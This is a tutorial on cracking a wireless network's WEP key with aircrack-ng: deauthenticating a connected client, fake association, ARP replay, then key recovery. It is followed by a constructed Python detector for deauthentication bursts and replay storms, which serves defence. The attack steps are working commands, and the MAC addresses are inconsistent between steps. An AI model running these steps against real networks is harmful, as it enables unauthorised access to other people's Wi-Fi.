Step 1: Enter monitor mode
airmon-ng                  # list the wireless interfaces currently in use
airmon-ng check            # list processes that may interfere with wireless scanning
airmon-ng check kill       # kill the processes that may interfere with wireless scanning
airmon-ng start wlan0      # put wlan0 into monitor mode (creates the wlan0mon interface)
Use the iwconfig command to confirm that the Mode of wlan0mon has switched to Monitor.

Step 2: Start capturing packets and save them to a file
airodump-ng wlan0mon -c 1 --bssid 00:11:22:33:44:55 -w wep   # --bssid MAC of the target AP; -c channel to listen on; -w prefix of the capture files (airodump-ng writes wep-01.cap, so give the prefix, not a .cap name)

Step 3: Deauthentication to obtain the XOR keystream file (a device must already be connected to the wireless router)
Send deauthentication frames to disconnect a device (phone, laptop, etc.) that is currently connected to the AP (router), so that the device reconnects.
aireplay-ng -0 1 -a EC:26:CA:DC:29:B6 -c 08:57:00:0C:96:68 wlan0mon   # -0 1: send one round of deauthentication frames; -a MAC of the router (AP); -c MAC of the wireless client to disconnect; using wlan0mon
A .xor keystream file appearing in the capture directory shows that the keystream was captured successfully:

Step 4: Associate with the AP using the XOR file
aireplay-ng -1 60 -e TP_LINK7301 -y wep-01-80-89-17-1E-2B-44.xor -a 00:11:22:33:44:55 -h 66:77:55:33:22:11 wlan0mon   # -1 60: fake authentication, re-associating every 60 seconds; -e ESSID of the AP; -y the captured keystream file (use ls to find the .xor file name); -a MAC of the AP; -h MAC of your own wireless card; the card in use is wlan0mon

Step 5: Perform ARP replay
aireplay-ng -3 -b EC:26:CA:DC:29:B6 -h 66:77:55:33:22:11 wlan0mon   # -3: ARP request replay attack; -b MAC of the AP being attacked; -h MAC of your own wireless card; using wlan0mon

Step 6: Deauthenticate again to trigger an ARP packet (enter this command in a new window)
aireplay-ng -0 1 -a EC:26:CA:DC:29:B6 -c 08:57:00:0C:96:68 wlan0mon   # -0 1: send one round of deauthentication frames; -a MAC of the router (AP); -c MAC of the wireless client to disconnect; using wlan0mon
After the disconnected client reconnects, ARP packets will be captured.

Step 7: Once enough DATA has been collected, the password appears (the analysis can run in a new window while the capture continues)
aircrack-ng wep-01.cap     # analyse the capture file
The resulting password:
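From the defender's side, steps 3, 5 and 6 are noisy: a burst of deauthentication frames sent in the AP's own name, followed by thousands of identically sized data frames from one station. The detector below flags both patterns in a stream of 802.11 frame summaries. It is an added example, not part of this tutorial or of the aircrack-ng suite; the one-line summary format, the thresholds and the sample frames (reusing the tutorial's MAC addresses) are all constructed.

```python
from collections import defaultdict, deque

DEAUTH_BURST, DEAUTH_WINDOW = 5, 2.0    # deauth frames from one source within this many seconds
REPLAY_BURST, REPLAY_WINDOW = 20, 1.0   # same-length data frames from one station within this many seconds

def parse_frame(line):
    """Parse one constructed summary line: '<epoch> <type> <subtype> src=<mac> dst=<mac> len=<bytes>'."""
    ts, ftype, subtype, src, dst, length = line.split()
    return {"ts": float(ts), "type": ftype, "subtype": subtype,
            "src": src.split("=", 1)[1], "dst": dst.split("=", 1)[1],
            "len": int(length.split("=", 1)[1])}

def _bursting(windows, key, ts, limit, span):
    """Slide the per-key time window forward; True exactly once, when the count first reaches limit."""
    q = windows[key]
    q.append(ts)
    while ts - q[0] > span:
        q.popleft()
    return len(q) == limit

def detect(lines):
    """Return [(timestamp, alert)] for deauthentication bursts and ARP-replay-like storms."""
    alerts, deauth, replay = [], defaultdict(deque), defaultdict(deque)
    for f in map(parse_frame, lines):
        if f["type"] == "MGMT" and f["subtype"] == "deauth":
            # aireplay-ng -0 spoofs the AP as the sender, so the source is the BSSID itself
            if _bursting(deauth, f["src"], f["ts"], DEAUTH_BURST, DEAUTH_WINDOW):
                alerts.append((f["ts"], f"deauth burst from {f['src']} towards {f['dst']}"))
        elif f["type"] == "DATA":
            # replayed WEP ARP requests all have the same size; this is a heuristic, bulk TCP ACKs can look similar
            if _bursting(replay, (f["src"], f["len"]), f["ts"], REPLAY_BURST, REPLAY_WINDOW):
                alerts.append((f["ts"], f"possible ARP replay from {f['src']} ({f['len']}-byte frames)"))
    return alerts

def constructed_frames():
    """Constructed sample: a few beacons, a deauth burst spoofed from the AP, then a replay storm."""
    ap, sta = "EC:26:CA:DC:29:B6", "08:57:00:0C:96:68"
    lines = [f"1700000000.{i:02d} MGMT beacon src={ap} dst=FF:FF:FF:FF:FF:FF len=120" for i in range(3)]
    lines += [f"1700000001.{i:02d} MGMT deauth src={ap} dst={sta} len=26" for i in range(8)]
    lines += [f"1700000002.{i:02d} DATA data src={sta} dst={ap} len=68" for i in range(25)]
    return lines

if __name__ == "__main__":
    for ts, alert in detect(constructed_frames()):
        print(f"{ts:.2f}  {alert}")
```

On a real sensor the summary lines would be produced from a monitor-mode capture (for example by a small tshark/pyshark wrapper); the thresholds are deliberately low so that the single round sent by `aireplay-ng -0 1` already trips the deauth rule.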